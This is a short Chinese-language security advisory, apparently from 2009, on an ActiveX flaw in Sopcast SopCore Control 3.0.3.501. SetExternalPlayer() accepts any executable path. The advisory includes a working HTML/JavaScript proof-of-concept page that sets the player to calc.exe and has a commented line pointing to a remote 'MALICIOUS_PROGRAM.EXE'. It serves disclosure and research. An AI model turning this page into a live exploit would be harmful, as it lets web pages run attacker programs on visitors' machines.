发布日期：2009-02-26
更新日期：2009-02-27

受影响系统：

Sopcast SopCore Control 3.0.3.501

描述：

---

BUGTRAQ  ID: 33920

SopCore是一个视频播放插件，安装后可以观看TvBaby的网络电视。

SopCore控件的SetExternalPlayer()函数没有正确地验证ExternalPlayer属性参数，如果用户受骗访问了恶意网页，就可能将任意可执行文件关联到“外部播放器”按键上。之后当用户点击该按键时，就会未经提示便执行该文件。

<*来源：surfista
  
  链接：http://marc.info/?l=bugtraq&m=123566817815702&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<HTML>
<HEAD>
<script language="Javascript" type="text/JavaScript">
window.onload=function()
{
SopPlayer.InitPlayer();
//SopPlayer.SetExternalPlayer("\\\\192.168.0.1\\c$\\PATH\\TO\\MALICIOUS_PROGRAM.EXE");
SopPlayer.SetExternalPlayer("c:\\WINDOWS\\system32\\calc.exe");
SopPlayer.SetSopAddress("sop://broker.sopcast.com:3912/6002"); //A LIVE CHANNEL ...
SopPlayer.SetChannelName("CCTV5");
SopPlayer.Play();
}
</script>
</HEAD>
<BODY>
<OBJECT
        ID="SopPlayer"
        name="SopPlayer"
        CLASSID=clsid:8FEFF364-6A5F-4966-A917-A3AC28411659
        HEIGHT=375
        WIDTH=375>
</OBJECT>
</BODY>
</HTML>

建议：

---

厂商补丁：

Sopcast
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.sopcast.org/

浏览次数：2480
严重程度：0（网友投票）